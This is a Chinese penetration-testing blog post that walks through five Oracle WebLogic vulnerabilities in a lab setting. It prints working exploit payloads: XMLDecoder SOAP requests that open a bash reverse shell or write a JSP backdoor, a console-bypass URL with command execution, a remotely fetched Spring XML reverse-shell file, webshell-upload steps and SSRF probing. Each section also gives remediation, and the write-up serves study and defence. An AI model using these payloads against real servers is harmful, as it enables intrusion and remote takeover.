【渗透测试】Weblogic系列漏洞

已于 2022-11-01 21:57:08 修改
阅读量3.2k 收藏 12
点赞数 4
分类专栏: 网络安全 文章标签: web安全 网络安全 安全
于 2022-11-01 21:54:41 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53972936/article/details/127641450
版权

目录

🍺CVE-2017-10271(Weblogic XMLDecoder反序列化漏洞)

🍻1、漏洞原理

🍻2、影响版本

🍻3、漏洞验证

🍻4、修复方案

🍺CVE-2018-2628(Weblogic T3协议反序列化漏洞)

🍻1、漏洞原理

🍻2、影响版本

🍻3、漏洞验证

🍻4、修复方案

🍺CVE-2018-2894(WebLogic 任意文件上传漏洞)

🍻1、漏洞原理

🍻2、影响版本

🍻3、漏洞验证

🍻4、修复方案

🍺CVE-2020-14882、CVE-2020-14883(WebLogic未授权访问、命令执行漏洞)

🍻1、漏洞原理

🍻2、影响版本

🍻3、漏洞验证

🍻4、修复方法

🍺CVE-2014-4210(SSRF)

🍻1、漏洞原理

🍻2、影响版本

🍻3、漏洞验证

🍻4、修复方案

🍺CVE-2017-10271(Weblogic XMLDecoder反序列化漏洞)

🍻1、漏洞原理

    CVE-2017-10271漏洞主要是由WebLogic Server WLS组件远程命令执行漏洞,主要由wls-wsat.war触发该漏洞,触发漏洞url如下:http://IP:7001/wls-wsat/CoordinatorPortType post数据包,通过构造SOAP(XML)格式的请求,在解析的过程中导致XMLDecoder反序列化漏洞。

注意:CVE-2017-10271是对CVE-2017-3506 的补丁绕过,将其中的object替换成了void

🍻2、影响版本

Weblogic 10.3.6 | 12.1.3.0.0 | 12.2.1.1.0

🍻3、漏洞验证

🥗(1)漏洞地址

/wls-wsat/CoordinatorPortType
/wls-wsat/RegistrationPortTypeRPC
/wls-wsat/ParticipantPortType
/wls-wsat/RegistrationRequesterPortType
/wls-wsat/CoordinatorPortType11
/wls-wsat/RegistrationPortTypeRPC11
/wls-wsat/ParticipantPortType11
/wls-wsat/RegistrationRequesterPortType1

🥗(2)Payload

🥂POC1:反弹shell

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
    <soapenv:Header>
        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
            <java version="1.4.0" class="java.beans.XMLDecoder">
                <void class="java.lang.ProcessBuilder">
                    <array class="java.lang.String" length="3">
                        <void index="0">
                            <string>/bin/bash</string>
                        </void>
                        <void index="1">
                            <string>-c</string>
                        </void>
                        <void index="2">
                            <string>bash -i &gt;&amp; /dev/tcp/192.168.244.128/777 0&gt;&amp;1</string>
                        </void>
                    </array>
                    <void method="start"/>
                </void>
            </java>
        </work:WorkContext>
    </soapenv:Header>
    <soapenv:Body/>
</soapenv:Envelope>

🥂POC2:写入后门

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
        <java><java version="1.4.0" class="java.beans.XMLDecoder">
            <object class="java.io.PrintWriter">
           <string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/test.jsp</string>
                <void method="println">
                    <string>
                        <![CDATA[
                            <% out.print("test"); %>
                        ]]>
                	</string>
                </void>
                <void method="close"/>
            </object></java></java>
    </work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>

🍻4、修复方案

(1)根据攻击者利用POC分析发现所利用的为wls-wsat组件的CoordinatorPortType接口,若Weblogic服务器集群中未应用此组件,建议临时备份后将此组件删除,当形成防护能力后,再进行恢复。

(2)下载官方补丁修复。

🍺CVE-2018-2628(Weblogic T3协议反序列化漏洞)

🍻1、漏洞原理

    攻击者利用其他rmi【远程方法调用】绕过weblogic黑名单限制,然后在将加载的内容利用readObject解析,从而造成反序列化远程代码执行该漏洞,该漏洞主要由于T3服务触发,所有开放weblogic控制台7001端口,默认会开启T3服务,攻击者发送构造好的T3协议 数据,就可以获取目标服务器的权限。

🍻2、影响版本

Weblogic 10.3.6.0 | 12.1.3.0 | 12.2.1.2 | 12.2.1.3

🍻3、漏洞验证

利用漏洞验证工具进行测试发现存在该漏洞

🍻4、修复方案

(1)若通过Nginx/Apache配置反向代理的方式访问Weblogic应用,就限制Weblogic T3的直接访问,此漏洞也将不能直接被利用。

(2)打官方的最新补丁。

🍺CVE-2018-2894(WebLogic 任意文件上传漏洞)

🍻1、漏洞原理

    Weblogic管理端未授权的两个页面存在任意上传getshell漏洞,可直接获取权限。Oracle 7月更新中,修复了Weblogic Web Service Test Page中一处任意文件上传漏洞,Web Service Test Page 在“生产模式”下默认不开启,所以该漏洞有一定限制。两个页面分别为/ws_utc/begin.do,/ws_utc/config.do

🍻2、影响版本

Weblogic 10.3.6.0 | 12.1.3.0 | 12.2.1.2 | 12.2.1.3

🍻3、漏洞验证

(1)通过http://IP:7001/console访问靶场,进行登录,账号密码随机生成,查询命令:docker-compose logs | grep password

(2)点击base_domain的配置,在“高级”中开启“启用 Web 服务测试页”选项

(3)访问漏洞页面:http://ip:7001/ws_utc/config.do,设置当前工作目录为:/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css,点击提交。

(4)上传shell(jsp马):点击左上角的“安全”,“添加”上传木马文件,并在返回包中知道到时间戳,并通过以下路径访问或连接木马文件:http://ip:7001/ws_utc/css/config/keystore/[时间戳]_[文件名]

🍻4、修复方案

升级到最新版。

🍺CVE-2020-14882、CVE-2020-14883(WebLogic未授权访问、命令执行漏洞)

🍻1、漏洞原理

    CVE-2020-14882允许未授权的用户绕过管理控制台的权限验证访问后台,CVE-2020-14883允许后台任意用户通过HTTP协议执行任意命令。使用这两个漏洞组成的利用链,可通过一个GET请求在远程Weblogic服务器上以未授权的任意用户身份执行命令。

🍻2、影响版本

weblogic 10.3.6.0 | 12.1.3.0 | 12.2.1.3 | 12.2.1.4 | 14.1.1.0

🍻3、漏洞验证

(1)利用权限绕过漏洞(CVE-2020-14882),直接访问,漏洞URL:http://ip:7001/console/css/%252e%252e%252fconsole.portal或者http://ip:7001/console/images/%252e%252e%252fconsole.portal,其中%252e%252e%252f为../的URL二次编码。

(2)虽然成功登录到后台页面但当前用户是低权限用户,并不能执行命令此时需要用到第二个漏洞CVE-2020-14883。这个漏洞的利用方式有两种,一是通过com.tangosol.coherence.mvel2.sh.ShellSession,二是通过com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContex。其中第一种方法只能在Weblogic 12.2.1以上版本利用,因为10.3.6并不存在com.tangosol.coherence.mvel2.sh.ShellSession类,第二种方法是一种更为通用的方法,最早在CVE-2019-2725被提出,对于所有Weblogic版本均有效。

(2.1)com.tangosol.coherence.mvel2.sh.ShellSession:执行成功好页面显示404,但是在docker容器中查看已成功创建test文件夹,查询命令:docker-compose exec weblogic ls /tmp

🥂POC:

http://IP:7001/console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27touch /tmp/test%27);%22)

(2.2)com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContex:该方法需要提前将恶意代码部署在任意网站目录下,当访问该木马文件时即可触发,返回界面任是404界面,但是可以正常反弹。

触发方式:

http://192.168.244.128:7001/console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://192.168.244.1/poc.xml(木马文件路径)")

🥂POC1:反弹shell

<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
       xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
    <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
        <constructor-arg>
            <list>
                <value>bash</value>
                <value>-c</value>
                <value><![CDATA[bash -i >& /dev/tcp/IP/端口 0>&1]]></value>
            </list>
        </constructor-arg>
    </bean>
</beans>

🥂POC2:创建文件夹

<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
   xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
   xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
    <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
        <constructor-arg>
          <list>
            <value>bash</value>
            <value>-c</value>
            <value><![CDATA[touch /tmp/success2]]></value>
          </list>
        </constructor-arg>
    </bean>
</beans>

🍻4、修复方法

(1)及时下载官方补丁进行升级修复。

(2)关闭后台/console/console.portal的访问权限。

(3)修改后台默认地址

🍺CVE-2014-4210(SSRF)

🍻1、漏洞原理

    利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。访问http://ip:7001/uddiexplorer/,无需登录即可查看 uddiexplorer 应用。

🍻2、影响版本

weblogic 10.0.2 | 10.3.6

🍻3、漏洞验证

    访问漏洞测试点:http://IP:7001/uddiexplorer/SearchPublicRegistries.jsp,点击search,利用bp抓包,operator为可控参数,可以利用该漏洞进行内网探测。若该端口开放则返回“returned a 404 error code”,否则返回“could not connect over HTTP to server”

🍻4、修复方案

(1)删除uddiexplorer文件夹;限制uddiexplorer应用只能内网访问

(2)将SearchPublicRegistries.jsp直接删除

(3)Weblogic服务端请求伪造漏洞出现在uddi组件(所以安装Weblogic时如果没有选择uddi组件那么就不会有该漏洞),更准确地说是uudi包实现包uddiexplorer.war下的SearchPublicRegistries.jsp。方法三采用的是改后辍的方式,修复步骤如下:

    1)将weblogic安装目录下的wlserver_10.3/server/lib/uddiexplorer.war做好备份;

    2)将weblogic安装目录下的server/lib/uddiexplorer.war下载;

    3)用winrar等工具打开uddiexplorer.war;

    4)将其下的SearchPublicRegistries.jsp重命名为SearchPublicRegistries.jspx;

    5)保存后上传回服务端替换原先的uddiexplorer.war;

    6)对于多台主机组成的集群,针对每台主机都要做这样的操作;

    7)由于每个server的tmp目录下都有缓存所以修改后要彻底重启weblogic。

离陌lm
关注
  • 4
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
weblogic uddiexplorer漏洞解决方法
anhuixiaozi的专栏
04-12 2万+
weblogic uddiexplorer漏洞
雷石weblogic漏洞扫描工具
08-27
雷石weblogic漏洞扫描工具
weblogic发序列化命令执行漏洞工具分享
u011790603的博客
07-30 2027
weblogic发序列化命令执行漏洞工具分享 weblogic发序列化命令执行漏洞工具分享(链接: https://pan.baidu.com/s/1qE5MFJ32672l-MMl-QL-wQ 密码: d85j) JBOSS_EXP 工具分享(链接: https://pan.baidu.com/s/1SF_0oSN_lar9dkTWOZKDDw 密码: zfrd) oracle提权执行命令工具o...
CVE-2023-21839漏洞复现(基于vulhub)
weixin_63960760的博客
09-11 804
由于Weblogic IIOP/T3协议存在缺陷,当IIOP/T3协议开启时,允许未经身份验证的攻击者通过IIOP/T3协议网络访问攻击存在安全风险的WebLogic Server,漏洞利用成功WebLogic Server可能被攻击者接管执行任意命令导致服务器沦陷或者造成严重的敏感数据泄露。
Weblogic反序列化漏洞原理分析及漏洞复现(CVE-2024-2628 CVE-2024-21839复现)_weblogic payload
最新发布
2301_77121488的博客
05-13 675
WebLogic 存在远程代码执行漏洞(CVE-2023-21839/CNVD-2023-04389),由于Weblogic IIOP/T3协议存在缺陷,当IIOP/T3协议开启时,允许未经身份验证的攻击者通过IIOP/T3协议网络访问攻击存在安全风险的WebLogic Server,漏洞利用成功WebLogic Server可能被攻击者接管执行任意命令导致服务器沦陷或者造成严重的敏感数据泄露。JRMP是一个Java远程方法协议,该协议基于TCP/IP之上,RMI协议之下。
weblogic CVE-2014-4210 SSRF漏洞
ChenD的学习笔记
05-22 1268
然后直接VPS拉取vulhub的镜像出现连接不到反弹shell的问题(但是成功写入了,其实也算完成实验了),最后本地搞出来啦,结果没有ssh,猛男哭泣!redis可能存在未授权访问漏洞,同时redis默认是不对外开放的,意思就是说只有内网可以访问redis服务器,外网访问不到,这时候就体现出了SSRF请求伪造漏洞的作用。然后kali也出问题了,docker拉取的vulhub拉取的weblogic/ssrf 镜像,启动后只启动了weblogic,redis起不来,很怪异。
Weblogic漏洞 - Weblogic 弱口令漏洞
HAKUNAMATATATTA的博客
12-02 1899
WebLogic Server 是美国甲骨文( Oracle )公司开发的一款适用于云环境和传统环境的应用服务中间件,确切的说是一个基于 JavaEE 架构的中间件,它提供了一个现代轻型开发平台,用于开发、集成、部署和管理大型分布式 Web 应用、网络应用和数据库应用的 Java 应用服务器。将Java 的动态功能和 Java Enterprise 标准的安全性引入大型网络应用的开发、集成、部署和管理之中。
渗透测试:渗透流程思路(当拿到一个WindowsIP,演示weblogic漏洞cve-2020-14882)
01-12
渗透测试:渗透流程思路(当拿到一个WindowsIP,演示weblogic漏洞cve-2020-14882)
【推荐】渗透测试工程师(CISP-PTE)认证培训课件资料合集(18份).zip
11-29
推荐,注册信息安全专业人员渗透测试工程师(CISP-PTE)认证培训课件资料合集,共18份。 001-Linux操作系统安全V2.0.pptx 002-Windows操作系统安全V2.0.pptx 003-数据库安全.pptx 004-Web安全基础0 - 介绍.pptx 005...
常见中间件漏洞总结PPT
01-25
常见中间件漏洞总结PPT,内含tomcat、weblogic、Nginx、iis、jboss等的常见漏洞和介绍,培训学习均可用。
weblogic scanner
03-24
用于扫描weblogic漏洞 python ws.py -t 127.0.0.1:80
weblogic cmd命令漏洞检测
04-08
weblogic中cmd反序列号漏洞检测,必须要求是java8的环境启动,也可以选择对jboos的漏洞,对安全测评来说,比较重要,可以复现漏洞
weblogic原理常见漏洞
qq_52973916的博客
08-11 153
Weblogic常见漏洞
vulhub靶场-weblogic漏洞复现
m0_62008601的博客
07-18 1752
vulhub-weblogic漏洞复现集 weak-password CVE-2018-2894 SSRF(CVE-2014-4210) CVE-2020-14882&14883 CVE-2018-2628 CVE-2017-10271
Weblogic SSRF(CVE-2014-4210)漏洞复现
m0_64583632的博客
02-06 498
Weblogic SSRF(CVE-2014-4210)漏洞复现
介绍一些 Weblogic 常见的漏洞
CSDN大数据
05-24 843
介绍 Weblogic 常见的漏洞,其中包括:弱口令、Java 反序列化、XMLdecoder 反序列化、SSRF 漏洞、任意文件上传,并根据其漏洞,使用 Docker+...
WebLogic wls9-async 反序列化漏洞(详细干货)
Bul1et的博客
04-25 5377
前天刚刚爆出了WebLogic wls9-async 反序列化漏洞,大佬们又可以薅羊毛了,这是我的复现过程,仅供参考 影响范围 Oracle WebLogic Server10.3.6.0.0 Oracle WebLogic Server12.1.3.0.0 Oracle WebLogic Server12.2.1.1.0 Oracle WebLogic Server12.2.1.2.0...
Weblogic WLS Core Components 反序列化命令执行漏洞(CVE-2018-2628)
huangyongkang666的博客
07-25 642
Weblogic WLS Core Components 反序列化命令执行漏洞(CVE-2018-2628)
How can you disable the UDDI and UDDI Explorer functionality in WebLogic Server? (Doc ID 1274906.1)
fendyzhou
05-08 1329
禁用weblogic的UDDI组件 官方指导说明文档链接: https://support.oracle.com/epmos/faces/DocumentDisplay?_afrLoop=358755960149292&id=1274906.1&displayIndex=1&_afrWindowMode=0&_adf.ctrl-state=nkquf7dmn_61#FIX How
weblogic客户端
10-13
您的问题是关于weblogic客户端的,我可以为您提供一些基本信息。WebLogic客户端是指可以连接到WebLogic服务器并与之交互的应用程序或工具WebLogic客户端可以是Java应用程序、Web浏览器、命令行工具等。WebLogic客户端可以通过HTTP、HTTPS、RMI等协议与WebLogic服务器进行通信。 如果您需要使用Java应用程序作为WebLogic客户端,您需要使用WebLogic提供的Java API。WebLogic提供了一组Java类和接口,可以让Java应用程序连接到WebLogic服务器并与之交互。您可以使用这些API来执行各种操作,例如部署应用程序、管理JMS队列、管理JDBC数据源等。 如果您需要使用Web浏览器作为WebLogic客户端,您可以使用WebLogic提供的管理控制台。管理控制台是一个基于Web的应用程序,可以通过浏览器访问。管理控制台提供了一个图形化界面,可以让您管理WebLogic服务器的各种配置和运行时信息。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

离陌lm

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值